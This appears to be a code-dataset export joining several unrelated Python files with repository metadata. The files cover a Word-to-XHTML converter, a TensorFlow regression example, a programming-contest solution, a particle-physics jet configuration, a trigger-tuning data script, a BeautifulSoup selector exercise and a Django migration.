# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
""" """
from oxml2xhtml_baseState import BaseState
class NullState(BaseState):
pass
class DocumentState(BaseState):
pass
class BodyState(BaseState):
pass
class ParaState(BaseState): # Heading, BlockQuote, DT, DD, Lists, etc...
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
self.__pLastChild = self.parentState._currentHtmlElement.getLastChild()
self._currentHtmlElement = self._currentHtmlElement.addChildElement("p")
self._numId = ""
self._nestedLevel = ""
def startElement(self, name, attrs):
if name=="w:bookmarkStart":
bookmarkId = attrs.get("w:id")
bookmarkName = attrs.get("w:name")
prefix = self._oxml.idPrefix + self._oxml.bookmarkPrefix
self._currentHtmlElement.addAttribute("id", prefix + bookmarkName)
elif name=="w:bookmarkEnd":
bookmarkId = attrs.get("w:id")
def endState(self):
style = self._style or ""
pce = self.parentState._currentHtmlElement
e = self._currentHtmlElement
if style.startswith("Heading"):
style = "h" + style[-1]
if style.startswith("h"):
e.name = style
elif style.startswith("bq"):
level = int(style[2])
e.name = "blockquote"
e.setAttribute("class", "bq level%s %s" % (level, style))
e = e.addChildElement("p")
elif style.startswith("dt") or style.startswith("dd"):
try:
level = int(style[2])
except:
level = 0
ename = style[:2]
if self.__pLastChild and self.__pLastChild.name=="dl":
dl = self.__pLastChild
else:
dl = pce.addChildElement("dl")
e.name = ename
e.setAttribute("class", "%s level%s" % (style, level-1))
#e = dl.addChildElement(ename, {"class": "%s level%s" % (style, level-1)})
dl.addChild(e)
elif style.startswith("li") or style=="ListParagraph":
listType = "ol" # default
attStyle = ""
if style=="ListParagraph": # Word lists
#self._numId
level = self._nestedLevel
ltype = style
info = self._oxml.numbering.getNumLevelInfo(self._numId, level)
format = info.get("format", "")
try:
leftIndent = info.get("leftIndent", "0")
leftIndent = int(int(leftIndent)/180)
attStyle += "padding-left:%sex;" % leftIndent
except:
pass
if format=="bullet":
listType = "ul"
classStyle = "ulb"
elif format=="decimal":
classStyle = "lin"
elif format=="lowerLetter":
classStyle = "lia"
elif format=="lowerRoman":
classStyle = "lii"
elif format=="upperLetter":
classStyle = "liA"
elif format=="upperRoman":
classStyle = "liI"
else:
classStyle = style
else:
level = int(style[2])
ltype = style[3]
classStyle = style[:2] + style[3]
if ltype=="b":
listType = "ul"
# Find the pe(parent element) that we should be attacting to
def isListElement(e):
return e and (e.name=="ol" or e.name=="ul")
pListElems = []
pLastChild = self.__pLastChild # __pLastChild = parentState htmlElement lastChild
while isListElement(pLastChild): # find the depthest listElement first
pListElems.insert(0, pLastChild) # process depthest first
try:
#pLastChild = ul/li:last/ul:last
pLastChild = pLastChild.getLastChild().getLastChild()
except:
break
#print "pListElems='%s'" % len(pListElems)
listElem = None
for listE in pListElems:
if listE.tag==style + self._numId + self._nestedLevel:
listE.addChildElement("li").addChild(e)
listElem = listE
break
else:
if level>listE.tagLevel:
li = listE.getLastChild()
## add to listItem or add to listItem's p element
addTo = li # add to the listItems
# or add to the listItem's p element
# p = li.getLastChild()
# addTo = p
## NOTE: also the while loop above needs to be changed
## #pLastChild = ul/li:last/p:last/ul:last
## pLastChild = pLastChild.getLastChild().getLastChild().getLastChild()
##
newListElem = addTo.addChildElement(listType, {"class":classStyle})
newListElem.tag = style + self._numId + self._nestedLevel
newListElem.tagLevel = level
newListElem.addChildElement("li").addChild(e)
listElem = newListElem
break
if listElem is None:
# create a new top-level list element
newListElem = pce.addChildElement(listType, {"class":classStyle})
newListElem.tag = style + self._numId + self._nestedLevel
newListElem.tagLevel = level
newListElem.addChildElement("li").addChild(e)
elif style=="Title":
e.name = "h1"
e.setAttribute("class", "title")
if self.html.title=="":
self.html.title = e.text
elif style=="p-center":
e.setAttribute("class", "centered")
elif style=="p-right":
e.setAttribute("class", "right-aligned")
elif style=="p-indent":
e.setAttribute("class", "indented")
elif style.startswith("pre"):
level = 0
try:
level = int(style[3])
except:
pass
e.name = "pre"
e.setAttribute("class", "pre level%s" % level)
else:
pass
# return False if endState is canceled
return True
def __processList(self):
pass
class ParaPropState(BaseState):
# w:pPr
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
if name=="w:pStyle":
self._style = attrs.get("w:val", "")
def endState(self):
p = self.parentState
p._style = self._style
# return False if endState is canceled
return True
class ParaNumPropState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
if name=="w:numId":
val = attrs.get("w:val", "")
p = self.parentState.parentState
p._numId = val
elif name=="w:ilvl":
val = attrs.get("w:val", "0")
p = self.parentState.parentState
p._nestedLevel = val
class RunState(BaseState): # inline
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
self._styles = []
def startElement(self, name, attrs):
if name=="w:br":
self._text += "\n"
elif name=="w:tab":
self._text += "\t"
def endState(self):
ce = self._currentHtmlElement
text = self._text
children = []
# HACK - treat code as pre-formatted ???
if "code" in self._styles:
t = self._html.createText(text)
t = str(t)
t = t.replace("\n", "<br/>").replace("\t", " "*4)
text = self._html.createRawText(t)
children.append(text)
elif text.find("\n")==-1: # no new lines found
children.append(text)
else:
lines = text.split("\n")
children.append(lines.pop(0))
for line in lines:
#ce.addChildElement("br")
children.append(self.html.createElement("br"))
children.append(line)
# HACK - megre sibling code elements into one ???
if len(self._styles)==1 and ce.getLastChild().name==self._styles[0]:
ce = ce.getLastChild()
else:
for style in self._styles:
ce = ce.addChildElement(style)
for child in children:
ce.addChild(child)
# return False if endState is canceled
return True
def addStyle(self, style):
self._styles.append(style)
class RunPropState(BaseState):
# w:rPr
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
p = self.parentState
styleName = None
if name=="w:rStyle":
name = attrs.get("w:val", "")
if name=="i-code":
styleName = "code"
elif name=="i-sub":
styleName = "sub"
elif name=="i-sup":
styleName = "sup"
elif name=="w:b":
styleName = "b"
elif name=="w:i":
styleName = "i"
if styleName is not None:
p.addStyle(styleName)
def endState(self):
# return False if endState is canceled
return True
class TextState(BaseState):
# r:t
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def characters(self, text):
self.parentState._text += text
class HyperlinkState(BaseState):
# w:hyperlink
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
ce = self._currentHtmlElement
aName = attrs.get("w:anchor")
rId = attrs.get("r:id") #="rId5"
if aName:
prefix = self._oxml.idPrefix + self._oxml.bookmarkPrefix
href = "#" + prefix + aName
ce = ce.addChildElement("a", href=href)
else:
docRels = self._oxml.docRels
target, tMode = docRels.getTarget(rId), docRels.getTargetMode(rId)
ce = ce.addChildElement("a", href=target)
if tMode.lower()=="external":
ce.addAttribute("type", "external")
self._currentHtmlElement = ce
def endState(self):
# return False if endState is canceled
return True
class IgnoreState(BaseState):
pass
class UnknownState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def startElement(self, name, attrs):
pass
def characters(self, text):
pass
def endState(self):
# return False if endState is canceled
return True
class SectPropState(BaseState):
def __init__(self, parentState, name=None, attrs={}):
BaseState.__init__(self, parentState, name, attrs)
def endState(self):
# return False if endState is canceled
return True
| [
"[email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] | [email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
a28750d60b8ec5ca5296f66052472828b084a86a | 293763954ad29020d68d17bb20b2ac8ce09b2412 | /Learning & Documentation/Create Models in Tensorflow/linear_regression.py | de2ef0001bad013224eaa176c22b37be896378d2 | [
"MIT"
] | permissive | grebtsew/Object-and-facial-detection-in-python | b4371d86ca1b997c310c961b4eeb975af42a8f78 | 4ef987f1de7509876ca1e3588b2d6f4afaef2a75 | refs/heads/master | 2023-03-30T16:52:07.192025 | 2022-07-29T16:00:50 | 2022-07-29T16:00:50 | 122,378,661 | 17 | 5 | MIT | 2023-03-25T01:49:15 | 2018-02-21T18:52:07 | Python | UTF-8 | Python | false | false | 3,681 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear regression using the LinearRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 1000
PRICE_NORM_FACTOR = 1000
def main(argv):
"""Builds, trains, and evaluates the model."""
#assert len(argv) == 1
(train, test) = imports85.dataset()
print(train)
print("-----")
print(test)
exit(0)
print("got dataset")
# Switch the labels to units of thousands for better convergence.
def to_thousands(features, labels):
return features, labels / PRICE_NORM_FACTOR
print("train")
train = train.map(to_thousands)
print("test")
test = test.map(to_thousands)
# Build the training input_fn.
def input_train():
return (
# Shuffling with a buffer larger than the data set ensures
# that the examples are well mixed.
train.shuffle(1000).batch(128)
# Repeat forever
.repeat().make_one_shot_iterator().get_next())
# Build the validation input_fn.
def input_test():
return (test.shuffle(1000).batch(128)
.make_one_shot_iterator().get_next())
feature_columns = [
# "curb-weight" and "highway-mpg" are numeric columns.
tf.feature_column.numeric_column(key="curb-weight"),
tf.feature_column.numeric_column(key="highway-mpg"),
]
# Build the Estimator.
model = tf.estimator.LinearRegressor(feature_columns=feature_columns)
# Train the model.
# By default, the Estimators log output every 100 steps.
model.train(input_fn=input_train, steps=STEPS)
# Evaluate how the model performs on data it has not yet seen.
eval_result = model.evaluate(input_fn=input_test)
# The evaluation returns a Python dictionary. The "average_loss" key holds the
# Mean Squared Error (MSE).
average_loss = eval_result["average_loss"]
# Convert MSE to Root Mean Square Error (RMSE).
print("\n" + 80 * "*")
print("\nRMS error for the test set: ${:.0f}"
.format(PRICE_NORM_FACTOR * average_loss**0.5))
# Run the model in prediction mode.
input_dict = {
"curb-weight": np.array([2000, 3000]),
"highway-mpg": np.array([30, 40])
}
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
input_dict, shuffle=False)
predict_results = model.predict(input_fn=predict_input_fn)
# Print the prediction results.
print("\nPrediction results:")
for i, prediction in enumerate(predict_results):
msg = ("Curb weight: {: 4d}lbs, "
"Highway: {: 0d}mpg, "
"Prediction: ${: 9.2f}")
msg = msg.format(input_dict["curb-weight"][i], input_dict["highway-mpg"][i],
PRICE_NORM_FACTOR * prediction["predictions"][0])
print(" " + msg)
print()
if __name__ == "__main__":
# The Estimator periodically generates "INFO" logs; make these logs visible.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run(main=main)
| [
"[email protected]"
] | |
4e0dade735408ec02614201f3dce6b1d129075a7 | a518141ca3ba2b6fa63a7961b51936d9438ff022 | /10812 - Beat the Spread!.py | 5d9944100b2a7760d5decf4054a94f3decb2b9c7 | [] | no_license | jlhung/UVA-Python | ec93b2c98e04c753e8356f3e4825584fae4a8663 | 7a0db4fecffd7ac4f377f93da41291a8e998ee9b | refs/heads/master | 2022-11-28T04:47:49.270187 | 2020-08-10T13:19:58 | 2020-08-10T13:19:58 | 116,969,745 | 19 | 9 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | n = int(input())
while n:
x, y = map(int, input().split())
if (x+y) % 2 or (x+y) < 0 or (x-y) < 0:
print("impossible")
else:
print(int((x+y) / 2), int((x-y) / 2))
n -= 1 | [
"[email protected]"
] | |
62085bac7af2c75ef4995d947ebe57ef7dcf9cb2 | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/ak6CaloJetSequence_pPb_mix_cff.py | 43faa9de8f5e464f8f33daa997f0ff65a0071833 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,457 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
ak6Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("ak6HiGenJetsCleaned")
)
ak6Caloparton = patJetPartonMatch.clone(src = cms.InputTag("ak6CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
ak6Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("ak6CaloJets"),
payload = "AK6Calo_HI"
)
ak6CalopatJets = patJets.clone(jetSource = cms.InputTag("ak6CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("ak6Calocorr")),
genJetMatch = cms.InputTag("ak6Calomatch"),
genPartonMatch = cms.InputTag("ak6Caloparton"),
jetIDMap = cms.InputTag("ak6CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
ak6CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("ak6CalopatJets"),
genjetTag = 'ak6HiGenJetsCleaned',
rParam = 0.6,
matchJets = cms.untracked.bool(True),
matchTag = 'akVs6CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
ak6CaloJetSequence_mc = cms.Sequence(
ak6Calomatch
*
ak6Caloparton
*
ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_data = cms.Sequence(ak6Calocorr
*
ak6CalopatJets
*
ak6CaloJetAnalyzer
)
ak6CaloJetSequence_jec = ak6CaloJetSequence_mc
ak6CaloJetSequence_mix = ak6CaloJetSequence_mc
ak6CaloJetSequence = cms.Sequence(ak6CaloJetSequence_mix)
| [
"[email protected]"
] | |
5a75b711fb29537898981bed0b06a74806f2c9fd | d6ed05e23faa20beb5e47624870608a9219ea81c | /TuningTools_old/scripts/analysis_scripts/dev/Trigger_20161214_20_7_7_3_LHbins/create_data.py | 085d2aa684d3438748ca6040bac02c4a8c3587d0 | [] | no_license | kaducovas/ringer | f6495088c0d54d622dcc707333b4c2fbf132d65f | 603311caab016ad0ef052ea4fcc605c5ac4e494b | refs/heads/master | 2020-06-16T21:37:15.228364 | 2019-07-08T01:29:57 | 2019-07-08T01:29:57 | 195,477,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,462 | py | #!/usr/bin/env python
import numpy as np
useLHBins = True
if useLHBins:
etaBins = [0.00,0.60,0.80,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
etBins = [15,20,30,40,50000]
# Thresholds
thres_lh_etavect = [0,0.6,0.8,1.15,1.37,1.52,1.81,2.01,2.37,2.47]
thres_lh_etvect = [4,7,10,15,20,25,30,35,40,45,50]
tight20160701 = np.array( [[0.484,0.532,0.490,0.466,0.252,0.510,0.494,0.384,0.349], # 4 GeV
[0.531,0.599,0.557,0.532,0.381,0.575,0.569,0.454,0.403], # 7 GeV
[0.594,0.641,0.589,0.572,0.416,0.587,0.580,0.554,0.472], # 10 GeV
[0.700,0.692,0.680,0.675,0.589,0.687,0.690,0.624,0.671], # 15 GeV
[0.709,0.686,0.694,0.689,0.646,0.701,0.718,0.677,0.734], # 20 GeV
[0.752,0.749,0.736,0.730,0.561,0.747,0.744,0.708,0.745], # 25 GeV
[0.776,0.773,0.761,0.760,0.614,0.752,0.769,0.728,0.795], # 30 GeV
[0.794,0.791,0.786,0.783,0.629,0.780,0.785,0.766,0.792], # 35 GeV
[0.803,0.795,0.782,0.792,0.613,0.783,0.800,0.780,0.820], # 40 GeV
[0.808,0.795,0.793,0.812,0.647,0.798,0.814,0.799,0.853]] ) * 100. # 45 GeV
medium20160701 = np.array([[0.667,0.674,0.652,0.617,0.343,0.609,0.592,0.576,0.524], # 4 GeV
[0.670,0.737,0.715,0.679,0.527,0.701,0.683,0.587,0.537], # 7 GeV
[0.751,0.778,0.746,0.712,0.549,0.721,0.713,0.707,0.649], # 10 GeV
[0.815,0.804,0.782,0.781,0.677,0.794,0.764,0.742,0.757], # 15 GeV
[0.833,0.810,0.813,0.811,0.735,0.823,0.814,0.802,0.815], # 20 GeV
[0.863,0.860,0.848,0.848,0.656,0.842,0.834,0.827,0.817], # 25 GeV
[0.886,0.873,0.870,0.864,0.681,0.835,0.861,0.829,0.848], # 30 GeV
[0.897,0.894,0.886,0.875,0.714,0.876,0.867,0.842,0.866], # 35 GeV
[0.900,0.891,0.887,0.882,0.708,0.883,0.879,0.862,0.896], # 40 GeV
[0.894,0.895,0.893,0.886,0.719,0.882,0.888,0.869,0.913]] ) * 100. # 45 GeV
loose20160701 = np.array( [[0.813,0.810,0.807,0.781,0.536,0.758,0.739,0.750,0.709], # 4 GeV
[0.819,0.816,0.813,0.787,0.670,0.808,0.789,0.753,0.711], # 7 GeV
[0.853,0.850,0.827,0.801,0.692,0.837,0.818,0.816,0.777], # 10 GeV
[0.886,0.882,0.869,0.858,0.752,0.854,0.855,0.823,0.802], # 15 GeV
[0.897,0.888,0.885,0.884,0.791,0.880,0.871,0.853,0.875], # 20 GeV
[0.921,0.913,0.905,0.894,0.708,0.894,0.875,0.858,0.853], # 25 GeV
[0.934,0.930,0.922,0.912,0.735,0.908,0.909,0.866,0.869], # 30 GeV
[0.942,0.940,0.937,0.930,0.779,0.931,0.931,0.905,0.913], # 35 GeV
[0.947,0.945,0.941,0.934,0.762,0.935,0.936,0.922,0.919], # 40 GeV
[0.951,0.949,0.948,0.943,0.774,0.940,0.944,0.926,0.945]]) * 100. # 45 GeV
veryloose20160701 = np.array([[0.896,0.893,0.890,0.884,0.719,0.875,0.866,0.859,0.821], # 4 GeV
[0.928,0.925,0.922,0.916,0.758,0.906,0.897,0.890,0.854], # 7 GeV
[0.928,0.925,0.922,0.915,0.766,0.906,0.897,0.889,0.856], # 10 GeV
[0.958,0.950,0.932,0.925,0.829,0.920,0.925,0.909,0.876], # 15 GeV
[0.966,0.957,0.955,0.943,0.844,0.943,0.929,0.916,0.904], # 20 GeV
[0.979,0.975,0.962,0.961,0.780,0.956,0.942,0.929,0.919], # 25 GeV
[0.988,0.985,0.980,0.973,0.803,0.961,0.956,0.923,0.922], # 30 GeV
[0.988,0.986,0.984,0.981,0.834,0.976,0.971,0.963,0.960], # 35 GeV
[0.990,0.988,0.987,0.983,0.835,0.978,0.974,0.970,0.972], # 40 GeV
[0.991,0.989,0.988,0.984,0.833,0.979,0.974,0.966,0.976]]) * 100. # 45 GeV
else:
etBins = [15, 20, 30, 40, 50, 500000 ]
etaBins = [0, 0.8 , 1.37, 1.54, 2.5]
tight20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[0.849, 0.83898649, 0.7945, 0.82856316] # Et 15
,[0.866025, 0.85846486, 0.7975, 0.85683684] # Et 20
,[0.892305, 0.88658649, 0.8109, 0.87986105] # Et 30
,[0.9014375, 0.89668919, 0.815, 0.89674474] # Et 40
,[0.902375, 0.90035135, 0.8235, 0.90092632]])*100. # Et 50
medium20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.906125, 0.8907973, 0.8385, 0.88125263] # Et 15
,[ 0.924125, 0.91683784, 0.8438, 0.91210316] # Et 20
,[ 0.944885, 0.93741676, 0.84908, 0.92400337] # Et 30
,[ 0.948, 0.94378378, 0.85675, 0.93723947] # Et 40
,[ 0.947125, 0.94508108, 0.8595, 0.93848421]])*100. # Et 50
loose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.9425, 0.93227027, 0.876, 0.9196 ] # Et 15
,[ 0.95465, 0.94708108, 0.8706, 0.93477684] # Et 20
,[ 0.96871, 0.96318919, 0.87894, 0.95187642] # Et 30
,[ 0.97425, 0.97103378, 0.884, 0.96574474] # Et 40
,[ 0.97525, 0.97298649, 0.887, 0.96703158]])*100. # Et 50
veryloose20160701 = np.array(
# eta 0 0.8 1.37 1.54
[[ 0.978, 0.96458108, 0.9145, 0.95786316]
,[ 0.98615, 0.97850541, 0.9028, 0.96738947]
,[ 0.99369, 0.9900427, 0.90956, 0.97782105]
,[ 0.995, 0.99293919, 0.917, 0.98623421]
,[ 0.99525, 0.99318919, 0.9165, 0.98582632]])*100.
#etaBins = [0, 0.8]
def standardRef( val ):
return np.array( val )
def transformToEFCalo( val ):
return np.array( val ) + (1 - np.array( val ) ) / 2
def mergeEffTable( val ):
import itertools
shape = val.shape
#shorterEtaEffTable = np.zeros( shape=(shape[0], 4) )
# eta 0.0, 0.6, 0.8, 0.15, 1.37, 1.52, 1.81, 2.01, 2.37
#for etIdx, etaIdx in itertools.product( range( shape[0] ), range( 4 ) ):
# if etaIdx == 0: # merge 0 -> .6 -> .8
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,0]*.6 + val[etIdx,1]*.2 ) / .8
# if etaIdx == 1: # merge 1.15 -> 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,2]*.22 + val[etIdx,3]*.15 ) / .37
# if etaIdx == 2: # 1.37 -> 1.52
# shorterEtaEffTable[etIdx,etaIdx] = val[etIdx,4]
# if etaIdx == 3: # merge 1.52 -> 1.8 -> 2.47
# shorterEtaEffTable[etIdx,etaIdx] = ( val[etIdx,5]*.29 + val[etIdx,6]*.2 + val[etIdx,7]*.46 )/(.95)
shorterEffTable = np.zeros( shape=(4,9) )
for etIdx, etaIdx in itertools.product( range(4), range(9) ):
refIdx = etIdx + 3
if etIdx == 0: # 15 up to 20
shorterEffTable[etIdx,etaIdx] = val[refIdx,etaIdx]
if etIdx == 1: # merge 20, 25
shorterEffTable[etIdx,etaIdx] = (val[refIdx,etaIdx]*.4 + val[refIdx+1,etaIdx]*.6)
if etIdx == 2: # merge 30, 35
shorterEffTable[etIdx,etaIdx] = (val[refIdx+1,etaIdx]*.48 + val[refIdx+2,etaIdx]*.52)
if etIdx == 3: # merge 40, 45
shorterEffTable[etIdx,etaIdx] = (val[refIdx+2,etaIdx]*.5 + val[refIdx+3,etaIdx]*.5)
return shorterEffTable
#for ref in (veryloose20160701, loose20160701, medium20160701, tight20160701):
ref = veryloose20160701
from RingerCore import traverse
if useLHBins:
pdrefs = mergeEffTable( ref )
else:
pdrefs = ref
print pdrefs
pfrefs = np.array( [[0.05]*len(etaBins)]*len(etBins) )*100. # 3 5 7 10
efficiencyValues = np.array([np.array([refs]) for refs in zip(traverse(pdrefs,tree_types=(np.ndarray),simple_ret=True)
,traverse(pfrefs,tree_types=(np.ndarray),simple_ret=True))]).reshape(pdrefs.shape + (2,) )
print efficiencyValues
basePath = '/home/wsfreund/CERN-DATA'
sgnInputFile = 'user.jodafons.mc15_13TeV.361106.PowhegPythia8EvtGen_AZNLOCTEQ6L1_Zee.merge.AOD.e3601_s2876_r7917_r7676.dump.trigPB.p0200_GLOBAL/'
bkgInputFile = 'user.jodafons.mc15_13TeV.423300.Pythia8EvtGen_A14NNPDF23LO_perf_JF17.merge.AOD.e3848_s2876_r7917_r7676.dump.trigEL.p0201_GLOBAL/'
outputFile = 'mc15_13TeV.361106.423300.sgn.trigegprobes.bkg.vetotruth.trig.l2calo.eg.std.grid.veryloose'
treePath = ["HLT/Egamma/Expert/support/probes",
"HLT/Egamma/Expert/support/trigger"]
#crossValPath = 'crossValid_5sorts.pic.gz'
#from TuningTools import CrossValidArchieve
#with CrossValidArchieve( crossValPath ) as CVArchieve:
# crossVal = CVArchieve
# del CVArchieve
import os.path
from TuningTools import Reference, RingerOperation
from TuningTools import createData
from RingerCore import LoggingLevel
createData( sgnFileList = os.path.join( basePath, sgnInputFile ),
bkgFileList = os.path.join( basePath, bkgInputFile ),
ringerOperation = RingerOperation.L2Calo,
referenceSgn = Reference.AcceptAll,
referenceBkg = Reference.Truth,
treePath = treePath,
pattern_oFile = outputFile,
#nClusters = 1000,
etBins = etBins,
etaBins = etaBins,
toMatlab = True,
efficiencyValues = efficiencyValues,
plotProfiles = True,
supportTriggers = True,
doMonitoring = False,
#level = LoggingLevel.VERBOSE
)
| [
"[email protected]"
] | |
0ff42ffdcd69c859b093f5e2f320ba03debf77c8 | fea9e7fc8b5ae1752a8917f415ddfcadc62ae540 | /practice/week2/css-selector/sel_books.py | 9e571bd96e24c0ce80be33267c1c92621b9eed3f | [] | no_license | Dadajon/dl-with-big-data | fc85e0dd13aa857b89c9b707faabcfc69b51fe24 | 8e7b543948be0773550a114dc6467627c88e445f | refs/heads/main | 2023-07-26T05:43:02.901241 | 2021-09-09T06:09:43 | 2021-09-09T06:09:43 | 328,919,918 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from bs4 import BeautifulSoup
fp = open("books.html", encoding='utf-8')
soup = BeautifulSoup(fp, 'html.parser')
sel = lambda q: print(soup.select_one(q).string)
sel("#nu") # id로 찾는 방법
sel("li#nu") # id와 tag로 찾는 방법
sel("ul > li#nu") # 부모 tag로 id와 tag로 찾는 방법
sel("#bible #nu") # id로 아래의 id를 찾는 방법
sel("#bible > #nu") # id 끼리 부모자식 관계를 나타낸것
sel("ul#bible > li#nu") #
sel("li[id='nu']")
sel("li:nth-of-type(4)")
print(soup.select("li")[3].string)
print(soup.find_all("li")[3].string) | [
"[email protected]"
] | |
4dd2952b692d1eb7f9535151212982a8483654d6 | 0bf183f870d39037a254695b163c833512a826f8 | /wapps/migrations/0016_auto_20161024_0925.py | 5799f374b78a09d39052c63d158a41562f899572 | [
"MIT"
] | permissive | apihackers/wapps | 47c57a762aec89bc398a152763a2b26005d8ffdc | e8158747aa3d77246d41142580faf9a5f2b0d968 | refs/heads/master | 2022-06-19T19:40:28.615502 | 2018-05-02T12:42:51 | 2018-05-02T12:42:51 | 59,942,417 | 7 | 2 | MIT | 2022-05-21T21:45:25 | 2016-05-29T12:40:01 | Python | UTF-8 | Python | false | false | 723 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-24 09:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from wapps.utils import get_image_model
class Migration(migrations.Migration):
dependencies = [
('wapps', '0015_identitysettings_amp_logo'),
]
operations = [
migrations.AlterField(
model_name='identitysettings',
name='amp_logo',
field=models.ForeignKey(blank=True, help_text='An mobile optimized logo that must be 600x60', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=get_image_model(), verbose_name='Mobile Logo'),
),
]
| [
"[email protected]"
] | |
12a314df473b007e01fcd646a5de9d22189aca4b | 9b7d1472086eed304320312043a95610a39baf9c | /easy_maps/migrations/0001_initial.py | 63a5e3ffb746437d92af2bbe813d7a74e7c6e4bc | [
"MIT"
] | permissive | duct-tape/django-easy-maps | 1831785952c5ef40028197d5ab618074b5a6053a | 790196fcb5652a76a64f7f513c4c4ef4a1c905df | refs/heads/master | 2020-05-28T05:14:18.312914 | 2019-04-21T04:40:29 | 2019-04-21T04:40:29 | 188,890,561 | 0 | 0 | MIT | 2019-05-27T18:20:17 | 2019-05-27T18:20:16 | null | UTF-8 | Python | false | false | 1,103 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('address', models.CharField(unique=True, max_length=255, verbose_name='address')),
('computed_address', models.CharField(max_length=255, null=True, verbose_name='computed address', blank=True)),
('latitude', models.FloatField(null=True, verbose_name='latitude', blank=True)),
('longitude', models.FloatField(null=True, verbose_name='longitude', blank=True)),
('geocode_error', models.BooleanField(default=False, verbose_name='geocode error')),
],
options={
'verbose_name': 'EasyMaps Address',
'verbose_name_plural': 'Address Geocoding Cache',
},
),
]
| [
"[email protected]"
] | |
64ccdd263ca98e95b24a5cf753dcf440d430245d | 10e1a046d2fb02d0742364c5d2ca3a40f9380416 | /py_wake/tests/test_windturbines/test_generic_wind_turbines.py | 0dec1eb35265b6ee19a256e891ed3db51e58c090 | [
"MIT"
] | permissive | Bowen-Du/PyWake | e1c407d4ff20101c95c28cd856faec729b414320 | 9a3c9a85f50082da01286b2dc8551a4e8f5fc037 | refs/heads/master | 2023-06-10T20:36:00.213649 | 2021-07-02T11:43:51 | 2021-07-02T13:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,371 | py | from py_wake.examples.data.hornsrev1 import V80, Hornsrev1Site
from py_wake.wind_turbines._wind_turbines import WindTurbine
